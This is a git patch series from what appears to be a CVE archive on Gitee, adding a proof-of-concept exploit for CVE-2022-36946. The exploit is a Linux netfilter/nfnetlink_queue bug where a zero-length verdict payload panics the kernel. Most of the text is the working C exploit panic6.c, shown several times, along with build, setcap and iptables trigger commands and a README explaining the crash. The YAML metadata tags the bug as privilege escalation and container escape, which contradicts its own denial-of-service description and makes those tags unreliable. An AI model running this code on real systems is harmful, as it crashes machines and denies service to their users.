From 0a867153a7ea01ca9c84dc24faf02a02a66d4290 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 06:50:40 +0000 Subject: [PATCH 01/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-36946?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/CVE-2022-36946/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2022/CVE-2022-36946/.keep diff --git a/cve/linux-kernel/2022/CVE-2022-36946/.keep b/cve/linux-kernel/2022/CVE-2022-36946/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 31748318ab3c93e52b98668e560684e392776abe Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 06:57:05 +0000 Subject: [PATCH 02/14] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-36946?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: liuxiaoxinxinxin --- .../2022/CVE-2022-36946/CVE-2022-36946-main.zip | Bin 0 -> 2597 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2022/CVE-2022-36946/CVE-2022-36946-main.zip 
diff --git a/cve/linux-kernel/2022/CVE-2022-36946/CVE-2022-36946-main.zip b/cve/linux-kernel/2022/CVE-2022-36946/CVE-2022-36946-main.zip new file mode 100644 index 0000000000000000000000000000000000000000..9589c9f2276435acb3bfb69e4d94df2ed633778f GIT binary patch literal 2597 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 literal 0 HcmV?d00001 -- Gitee From 57411a42039da44de0ac3e98a64abf02c5e2bff6 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:00:22 +0000 Subject: [PATCH 03/14] README.md Signed-off-by: liuxiaoxinxinxin --- .../2022/CVE-2022-36946/README.md | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cve/linux-kernel/2022/CVE-2022-36946/README.md diff --git a/cve/linux-kernel/2022/CVE-2022-36946/README.md b/cve/linux-kernel/2022/CVE-2022-36946/README.md new file mode 100644 index 00000000..9bb679ab --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-36946/README.md 
@@ -0,0 +1,39 @@ +# CVE-2022-36946 + +Reported-by: Domingo Dirutigliano and Nicola Guerrera + +While we were working on [firegex](https://github.com/Pwnzer0tt1/firegex), our application firewall for CTF Attack-Defence competitions, we stumbled upon a few kernel panics. + +This strange behavour was than isolated and anlayzed, leading to the dicovery of this potential security flaw in the netfilter module, specifically with nfnetlink. + +# How does it work? + +The kernel panics when sending nf\_queue verdict with 0-byte nfta\_payload attribute. + +``` +nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); +nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); +nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT ); +``` + +This happens because the IP/IPv6 stack pulls the IP(v6) header from the packet after the input hook. + +So, if user truncates the packet below the header size, this skb\_pull() will result in a malformed skb resulting in a panic. + +Try it executing [this](/panic6.c) c source code. + +# Fix up + +Fixed in linux kernel 5.19 [view diff](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/net/netfilter/nfnetlink_queue.c?id=v5.19&id2=v5.18) + +Original patch by the linux kernel security team [here](https://marc.info/?l=netfilter-devel&m=165883202007292&w=2) + +# Requirements for exploiting this vuln: + +- A vulnerable linux kernel +- CAP\_NET\_ADMIN capability + + +# Why panic6? + +It worked at the 6th attempt, so we kept the name. -- Gitee From 3d4013fb3105931b77a613d09b9ff725a95e7b9a Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:13:00 +0000 Subject: [PATCH 04/14] add cve/linux-kernel/2022/yaml/ CVE-2022-36946. Signed-off-by: liuxiaoxinxinxin --- cve/linux-kernel/2022/yaml/ CVE-2022-36946 | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cve/linux-kernel/2022/yaml/ CVE-2022-36946 
diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946 b/cve/linux-kernel/2022/yaml/ CVE-2022-36946 new file mode 100644 index 00000000..50c36934 --- /dev/null +++ b/cve/linux-kernel/2022/yaml/ CVE-2022-36946 @@ -0,0 +1,20 @@ +id: +CVE-2022-36946 +source: https://github.com/Pwnzer0tt1/CVE-2022-36946 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: 高危 + description: | + Linux 内核中 net/netfilter/nfnetlink_queue.c 到 5.18.14 中的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 + scope-of-influence: + 5.18.14 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 + - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2022-36946 + cwe-id: CWE-190 + tags: 权限提升,容器逃逸,cve2022 \ No newline at end of file -- Gitee From 210d495cc3e507bb9cdbce200593234410252cc8 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:14:37 +0000 Subject: [PATCH 05/14] rename Signed-off-by: liuxiaoxinxinxin --- .../2022/yaml/{ CVE-2022-36946 => CVE-2022-36946.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/linux-kernel/2022/yaml/{ CVE-2022-36946 => CVE-2022-36946.yaml} (100%) diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946 b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml similarity index 100% rename from cve/linux-kernel/2022/yaml/ CVE-2022-36946 rename to cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml -- Gitee From e1beb117d04c9bfbea726f8f6df32a6533e10324 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:16:12 +0000 Subject: [PATCH 06/14] firstcommit 
Signed-off-by: liuxiaoxinxinxin --- cve/linux-kernel/2022/CVE-2022-36946/panic6.c | 104 ++++++++++++++++++ 1 file changed, 104 insertions(+) create mode 100644 cve/linux-kernel/2022/CVE-2022-36946/panic6.c diff --git a/cve/linux-kernel/2022/CVE-2022-36946/panic6.c b/cve/linux-kernel/2022/CVE-2022-36946/panic6.c new file mode 100644 index 00000000..754d8409 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-36946/panic6.c 
@@ -0,0 +1,104 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +//How to compile: +//cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic + +int socket_conn(uint16_t port) +{ + int sockfd, connfd; + struct sockaddr_in servaddr, cli; + + // socket create and verification + sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); + if (sockfd == -1) { + perror("socket creation failed"); + exit(EXIT_FAILURE); + } + bzero(&servaddr, sizeof(servaddr)); + + // assign IP, PORT + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); + servaddr.sin_port = htons(port); + + // connect the client socket to server socket + connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); +} + +int main(int argc, char *argv[]) +{ + size_t BUF_SIZE = 0xffff+(MNL_SOCKET_BUFFER_SIZE/2); + char buf[BUF_SIZE]; + uint16_t queue_num = 1337; + struct nlmsghdr *nlh; + + puts("[*] Creating the socket with the kernel"); + struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) { + perror( "mnl_socket_open" ); + exit(EXIT_FAILURE); + } + puts("[*] Binding the socket"); + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { + perror( "mnl_socket_bind" ); + exit(EXIT_FAILURE); + } + + printf("[*] Sending the BIND command for the nfqueue %d\n",queue_num); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + perror( "mnl_socket_send" ); + exit(EXIT_FAILURE); + } + + puts("[*] Setting config to COPY_META mode"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff); + mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO)); + mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO)); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + 
perror( "mnl_socket_send" ); + exit(EXIT_FAILURE); + } + + printf("[*] You need to associate to this queue the port 1337: sudo iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num); + puts("Press ENTER to contiune (and panic)"); + getchar(); + + puts("[*] Sending a connection packet to nfqueue"); + socket_conn(1337); + + + puts("[*] Waiting for a packet in the nfqueue"); + if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) { + perror( "mnl_socket_recvfrom" ); + exit(EXIT_FAILURE); + } + + puts("[*] Sending the verdict with a NULL pointer and len = 0"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); + nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); + nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT ); + + puts("[*] Sending the verdict to the kernel, Good panic :D"); + sleep(1); //Only to see the print + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + perror( "mnl_socket_send" ); + exit(EXIT_FAILURE); + } + puts("[*] Are you still alive?"); + +} + + -- Gitee From f42e5e61aad61b6d1f3a5457d1cf57d030bcb511 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:17:15 +0000 Subject: [PATCH 07/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2022/CVE-2022-36946/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2022/CVE-2022-36946/README.md | 39 ------------------- 1 file changed, 39 deletions(-) delete mode 100644 cve/linux-kernel/2022/CVE-2022-36946/README.md diff --git a/cve/linux-kernel/2022/CVE-2022-36946/README.md b/cve/linux-kernel/2022/CVE-2022-36946/README.md deleted file mode 100644 index 9bb679ab..00000000 --- a/cve/linux-kernel/2022/CVE-2022-36946/README.md +++ /dev/null 
@@ -1,39 +0,0 @@ -# CVE-2022-36946 - -Reported-by: Domingo Dirutigliano and Nicola Guerrera - -While we were working on [firegex](https://github.com/Pwnzer0tt1/firegex), our application firewall for CTF Attack-Defence competitions, we stumbled upon a few kernel panics. - -This strange behavour was than isolated and anlayzed, leading to the dicovery of this potential security flaw in the netfilter module, specifically with nfnetlink. - -# How does it work? - -The kernel panics when sending nf\_queue verdict with 0-byte nfta\_payload attribute. - -``` -nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); -nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); -nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT ); -``` - -This happens because the IP/IPv6 stack pulls the IP(v6) header from the packet after the input hook. - -So, if user truncates the packet below the header size, this skb\_pull() will result in a malformed skb resulting in a panic. - -Try it executing [this](/panic6.c) c source code. - -# Fix up - -Fixed in linux kernel 5.19 [view diff](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/net/netfilter/nfnetlink_queue.c?id=v5.19&id2=v5.18) - -Original patch by the linux kernel security team [here](https://marc.info/?l=netfilter-devel&m=165883202007292&w=2) - -# Requirements for exploiting this vuln: - -- A vulnerable linux kernel -- CAP\_NET\_ADMIN capability - - -# Why panic6? - -It worked at the 6th attempt, so we kept the name. -- Gitee From 4b908c76c10828254dfd8ee14c11bf0b283db3b9 Mon Sep 17 00:00:00 2001 
From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:17:21 +0000 Subject: [PATCH 08/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2022/CVE-2022-36946/panic6.c?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/CVE-2022-36946/panic6.c | 104 ------------------ 1 file changed, 104 deletions(-) delete mode 100644 cve/linux-kernel/2022/CVE-2022-36946/panic6.c diff --git a/cve/linux-kernel/2022/CVE-2022-36946/panic6.c b/cve/linux-kernel/2022/CVE-2022-36946/panic6.c deleted file mode 100644 index 754d8409..00000000 --- a/cve/linux-kernel/2022/CVE-2022-36946/panic6.c +++ /dev/null 
@@ -1,104 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -//How to compile: -//cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic - -int socket_conn(uint16_t port) -{ - int sockfd, connfd; - struct sockaddr_in servaddr, cli; - - // socket create and verification - sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); - if (sockfd == -1) { - perror("socket creation failed"); - exit(EXIT_FAILURE); - } - bzero(&servaddr, sizeof(servaddr)); - - // assign IP, PORT - servaddr.sin_family = AF_INET; - servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); - servaddr.sin_port = htons(port); - - // connect the client socket to server socket - connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); -} - -int main(int argc, char *argv[]) -{ - size_t BUF_SIZE = 0xffff+(MNL_SOCKET_BUFFER_SIZE/2); - char buf[BUF_SIZE]; - uint16_t queue_num = 1337; - struct nlmsghdr *nlh; - - puts("[*] Creating the socket with the kernel"); - struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER); - if (nl == NULL) { - perror( "mnl_socket_open" ); - exit(EXIT_FAILURE); - } - puts("[*] Binding the socket"); - if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { - perror( "mnl_socket_bind" ); - exit(EXIT_FAILURE); - } - - printf("[*] Sending the BIND command for the nfqueue %d\n",queue_num); - nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); - nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND); - if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { - perror( "mnl_socket_send" ); - exit(EXIT_FAILURE); - } - - puts("[*] Setting config to COPY_META mode"); - nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); - nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff); - mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO)); - mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO)); - if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { - 
perror( "mnl_socket_send" ); - exit(EXIT_FAILURE); - } - - printf("[*] You need to associate to this queue the port 1337: sudo iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num); - puts("Press ENTER to contiune (and panic)"); - getchar(); - - puts("[*] Sending a connection packet to nfqueue"); - socket_conn(1337); - - - puts("[*] Waiting for a packet in the nfqueue"); - if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) { - perror( "mnl_socket_recvfrom" ); - exit(EXIT_FAILURE); - } - - puts("[*] Sending the verdict with a NULL pointer and len = 0"); - nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); - nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); - nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT ); - - puts("[*] Sending the verdict to the kernel, Good panic :D"); - sleep(1); //Only to see the print - if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { - perror( "mnl_socket_send" ); - exit(EXIT_FAILURE); - } - puts("[*] Are you still alive?"); - -} - - -- Gitee From 2122fe699364c4b58a991c1cfe108c94d6fcdeac Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:17:39 +0000 Subject: [PATCH 09/14] first commit Signed-off-by: liuxiaoxinxinxin --- .../2022/CVE-2022-36946/README.md | 39 +++++++ cve/linux-kernel/2022/CVE-2022-36946/panic6.c | 104 ++++++++++++++++++ 2 files changed, 143 insertions(+) create mode 100644 cve/linux-kernel/2022/CVE-2022-36946/README.md create mode 100644 cve/linux-kernel/2022/CVE-2022-36946/panic6.c diff --git a/cve/linux-kernel/2022/CVE-2022-36946/README.md b/cve/linux-kernel/2022/CVE-2022-36946/README.md new file mode 100644 index 00000000..9bb679ab --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-36946/README.md 
@@ -0,0 +1,39 @@ +# CVE-2022-36946 + +Reported-by: Domingo Dirutigliano and Nicola Guerrera + +While we were working on [firegex](https://github.com/Pwnzer0tt1/firegex), our application firewall for CTF Attack-Defence competitions, we stumbled upon a few kernel panics. + +This strange behavour was than isolated and anlayzed, leading to the dicovery of this potential security flaw in the netfilter module, specifically with nfnetlink. + +# How does it work? + +The kernel panics when sending nf\_queue verdict with 0-byte nfta\_payload attribute. + +``` +nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); +nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); +nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT ); +``` + +This happens because the IP/IPv6 stack pulls the IP(v6) header from the packet after the input hook. + +So, if user truncates the packet below the header size, this skb\_pull() will result in a malformed skb resulting in a panic. + +Try it executing [this](/panic6.c) c source code. + +# Fix up + +Fixed in linux kernel 5.19 [view diff](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/net/netfilter/nfnetlink_queue.c?id=v5.19&id2=v5.18) + +Original patch by the linux kernel security team [here](https://marc.info/?l=netfilter-devel&m=165883202007292&w=2) + +# Requirements for exploiting this vuln: + +- A vulnerable linux kernel +- CAP\_NET\_ADMIN capability + + +# Why panic6? + +It worked at the 6th attempt, so we kept the name. diff --git a/cve/linux-kernel/2022/CVE-2022-36946/panic6.c b/cve/linux-kernel/2022/CVE-2022-36946/panic6.c new file mode 100644 index 00000000..754d8409 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-36946/panic6.c 
@@ -0,0 +1,104 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +//How to compile: +//cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic + +int socket_conn(uint16_t port) +{ + int sockfd, connfd; + struct sockaddr_in servaddr, cli; + + // socket create and verification + sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); + if (sockfd == -1) { + perror("socket creation failed"); + exit(EXIT_FAILURE); + } + bzero(&servaddr, sizeof(servaddr)); + + // assign IP, PORT + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); + servaddr.sin_port = htons(port); + + // connect the client socket to server socket + connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); +} + +int main(int argc, char *argv[]) +{ + size_t BUF_SIZE = 0xffff+(MNL_SOCKET_BUFFER_SIZE/2); + char buf[BUF_SIZE]; + uint16_t queue_num = 1337; + struct nlmsghdr *nlh; + + puts("[*] Creating the socket with the kernel"); + struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) { + perror( "mnl_socket_open" ); + exit(EXIT_FAILURE); + } + puts("[*] Binding the socket"); + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { + perror( "mnl_socket_bind" ); + exit(EXIT_FAILURE); + } + + printf("[*] Sending the BIND command for the nfqueue %d\n",queue_num); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + perror( "mnl_socket_send" ); + exit(EXIT_FAILURE); + } + + puts("[*] Setting config to COPY_META mode"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff); + mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO)); + mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO)); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + 
perror( "mnl_socket_send" ); + exit(EXIT_FAILURE); + } + + printf("[*] You need to associate to this queue the port 1337: sudo iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num); + puts("Press ENTER to contiune (and panic)"); + getchar(); + + puts("[*] Sending a connection packet to nfqueue"); + socket_conn(1337); + + + puts("[*] Waiting for a packet in the nfqueue"); + if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) { + perror( "mnl_socket_recvfrom" ); + exit(EXIT_FAILURE); + } + + puts("[*] Sending the verdict with a NULL pointer and len = 0"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); + nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); + nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT ); + + puts("[*] Sending the verdict to the kernel, Good panic :D"); + sleep(1); //Only to see the print + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + perror( "mnl_socket_send" ); + exit(EXIT_FAILURE); + } + puts("[*] Are you still alive?"); + +} + + -- Gitee From 3215032cca9b0729e0cac9261cce7295025bbd88 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:17:48 +0000 Subject: [PATCH 10/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2022/CVE-2022-36946/CVE-2022-36946-main.zip?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2022/CVE-2022-36946/CVE-2022-36946-main.zip | Bin 2597 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2022/CVE-2022-36946/CVE-2022-36946-main.zip 
diff --git a/cve/linux-kernel/2022/CVE-2022-36946/CVE-2022-36946-main.zip b/cve/linux-kernel/2022/CVE-2022-36946/CVE-2022-36946-main.zip deleted file mode 100644 index 9589c9f2276435acb3bfb69e4d94df2ed633778f..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2597 zcmai$cT^K*7l$JxjJU#{5=Dd{1QHUK0xDr85Q)r2ED#77KvqOR#IhA5TQ(9C0m~Lc z7?H}*3fd?rC@TyR4F=hYj5w-ozxI4z+w;BeIrn}4`90_UbMJWw_M$*A;M<8Z2D|?D z`J>1JBmo#VYq$ZzzyOXiGDRD~gGm7)`mQb@z?K2dJ0HRyQHkH8#M|`u--`kONgx1V z*S|!atdCgXt@VP*e=^Rvd>=ZBgPdQxsaWL%lpaoQ9@CJcK{Vh_IF5G9dAt25gENiW}S3Q??wv{sVP`ByGJm3=6)c=-;FBU1c%1 zE)g`;yHfYUVZS#kUal|CdufC@SV@%qRNH!(^2v4pS`qb10(Tel&@g0qsm7hiE3DBN zp?Yw1dtFOwJvI_!$n$5ZiL2s_t73!b#FbMg&(uYUiXBHR(=nSNQJwBPkdm zDgRup(z{Do(CKt_?fr$)eAB$^Mm%1nZh8U=63oC(L&BRL}IqY|fM7U#9jSEgzeQ>$Ee(N!#&Ah*pC zp}3wl(gnAHjB^)#v5#=dAW#b%P5Hc7z}&6&@t$_Wl)jZGV{Fbq87BAS?Lay9hH|>h zpmQ(7KheeGN`^!vD>^3;*`UC-1FQeAe7IPWFAm*s*OyGiUR~QGj@jH6sE>e6=R@sY z9J88~rHkbFk4+u&i%sj(pCa{PH$nPbW1d1(;dg@I{#IS&*;3$4IV#%0CvO6Etgu&F zs0D@X3D>-7aMbhuC|0lc=2_&p@YTtm6fb%ye1dJ>*vPl%gM!|HS-yp@OA@`-?yJ{K zF|VUm+TIik%=j#qhfRg;{!sZ=+i*9>J}s!e-o${MO8RGIuZ+G?LF=MzL}p(`hAmzv 